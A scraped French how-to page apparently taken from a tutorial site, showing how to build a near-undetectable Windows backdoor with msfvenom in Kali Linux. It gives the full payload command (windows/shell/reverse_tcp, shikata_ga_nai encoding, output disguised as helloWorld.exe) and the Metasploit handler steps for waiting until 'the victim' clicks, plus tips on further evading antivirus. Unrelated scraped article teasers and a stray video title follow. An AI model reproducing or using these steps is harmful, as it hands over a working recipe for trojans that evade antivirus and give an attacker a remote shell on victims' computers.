Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux

Table des matières:

Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux
Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux

Vidéo: Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux

Vidéo: Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux
Vidéo: TECHNIQUE D'ATTAQUE-GOWIPE| CLASH OF CLANS FR 2024, Avril
Anonim

Une porte dérobée est utilisée pour contourner les mécanismes de sécurité, souvent secrètement et le plus souvent de manière indétectable. En utilisant MSFvenom, la combinaison de msfpayload et msfencode, il est possible de créer une porte dérobée qui se reconnecte à l'attaquant en utilisant le reverse shell TCP. Afin de développer une porte dérobée, vous devez modifier la signature de votre malware pour échapper à tout logiciel antivirus. Terminez ce projet sur une paire d'ordinateurs auxquels vous êtes autorisé à accéder, et dans le processus, vous en apprendrez plus sur la sécurité informatique et le fonctionnement de ce type de porte dérobée.

Pas

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 1
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 1

Étape 1. Démarrez Kali et lancez la console Terminal

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 2
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 2

Étape 2. Tapez ifconfig pour afficher l'interface et vérifier votre adresse IP

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 3
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 3

Étape 3. Tapez msfvenom -l encoders pour afficher la liste des encodeurs

Vous utiliserez x86/shikata_ga_nai comme encodeur

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 4
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 4

Étape 4. Tapez "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe

  • -a x86 --platform windows désigne l'architecture à utiliser.
  • -p windows/shell/reverse_tcp désigne les charges utiles à intégrer.
  • LHOST désigne l'adresse IP de l'auditeur.
  • LPORT désigne le port d'écoute.
  • -b "\x00" désigne pour éviter les mauvais caractères (octets nuls).
  • -e x86/shikata_ga_nai désigne le nom des encodeurs.
  • -f exe > helloWorld.exe désigne le format de sortie.
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 5
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 5

Étape 5. Tapez msfconsole pour activer le Metasploit

Vous avez maintenant généré votre porte dérobée. Lorsque la victime clique sur helloWorld.exe, la charge utile du shell qui est intégrée sera activée et établira une connexion avec votre système. Pour recevoir la connexion, vous devez ouvrir le multi-handler dans Metasploit et définir les payloads

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 6
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 6

Étape 6. Tapez use exploit/multi/handler

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 7
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 7

Étape 7. Tapez set payload windows/shell/reverse_tcp

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 8
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 8

Étape 8. Tapez show options pour vérifier le module

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 9
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 9

Étape 9. Tapez set LHOST 192.168.48.129

"LHOST" désigne l'adresse IP de l'auditeur

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 10
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 10

Étape 10. Tapez set LPORT 4444

"LPORT" désigne le port d'écoute

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 11
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 11

Étape 11. Tapez run et attendez la connexion de la machine de la victime

Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 12
Créez une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux Étape 12

Étape 12. Attendez que la victime clique sur helloWorld.exe

Ensuite, vous serez connecté avec succès à la machine de la victime.

Des astuces

  • L'utilisation de -i dans MSFvenom représentera les itérations de l'encodage. Parfois, plusieurs itérations peuvent aider à échapper au logiciel AV.
  • Vous avez appris à générer la porte dérobée et à l'encoder en utilisant MSFvenom, mais cette méthode ne fonctionnera pas parfaitement avec certains logiciels AV de nos jours. La raison derrière cela est à cause des modèles d'exécution dans MSFvenom. Les fournisseurs AV ont ajouté la signature statique de ces modèles et les recherchent simplement. La solution à ce problème consiste à utiliser un modèle d'exécution différent ou des outils différents.

Conseillé:

Comment créer une image disque à partir d'un système Linux à l'aide de Systemback

Comment créer une image disque à partir d'un système Linux à l'aide de Systemback

Avez-vous déjà essayé de cloner votre système Linux et de l'installer sur un autre ordinateur ? Si vous avez, vous pouvez comprendre que ce n'est pas une tâche facile. Il existe plusieurs programmes conçus pour une telle tâche, tels que Remastersys, Relinux, Ubuntu Builder et plusieurs autres, cependant, aucun d'entre eux ne semble terminer le travail à fond.

Comment créer un document PDF protégé par mot de passe dans Adobe Acrobat (à l'aide d'une enveloppe de sécurité)

Comment créer un document PDF protégé par mot de passe dans Adobe Acrobat (à l'aide d'une enveloppe de sécurité)

Bien que vous puissiez protéger des fichiers PDF individuels avec des mots de passe, cela peut devenir inutilement complexe si vous envoyez beaucoup de fichiers. Avec Adobe Acrobat, vous pouvez créer ce que l'on appelle une enveloppe de sécurité.

Comment programmer une télécommande de voiture GM à l'aide d'un porte-clés : 10 étapes

Comment programmer une télécommande de voiture GM à l'aide d'un porte-clés : 10 étapes

Votre ancienne télécommande de voiture est cassée, perdue ou fonctionne mal ? Cet article vous montrera un moyen rapide de remplacer votre ancienne télécommande de voiture et vous fera économiser beaucoup d'argent dans le processus. Dans cette méthode, un porte-clés est utilisé pour programmer la télécommande sur votre voiture.

Comment ajouter une définition à une image à l'aide d'une carte en relief dans Photoshop CC

Comment ajouter une définition à une image à l'aide d'une carte en relief dans Photoshop CC

L'esquive et la gravure sont une façon d'ajouter de la définition à une image. L'utilisation d'une bump map est une autre façon de le faire, et c'est remarquablement facile à faire. Pas Méthode 1 sur 2: Ajout destructif de l'effet Étape 1.

Comment créer une table de multiplication dans MATLAB à l'aide de boucles imbriquées

Comment créer une table de multiplication dans MATLAB à l'aide de boucles imbriquées

Cet article est destiné à aider les nouveaux utilisateurs à créer un fichier de fonction à l'aide de boucles imbriquées qui créeront une table de multiplication de n'importe quelle taille. Il existe de nombreuses façons d'en créer un, mais cette méthode est plus facile pour les débutants de MATLAB.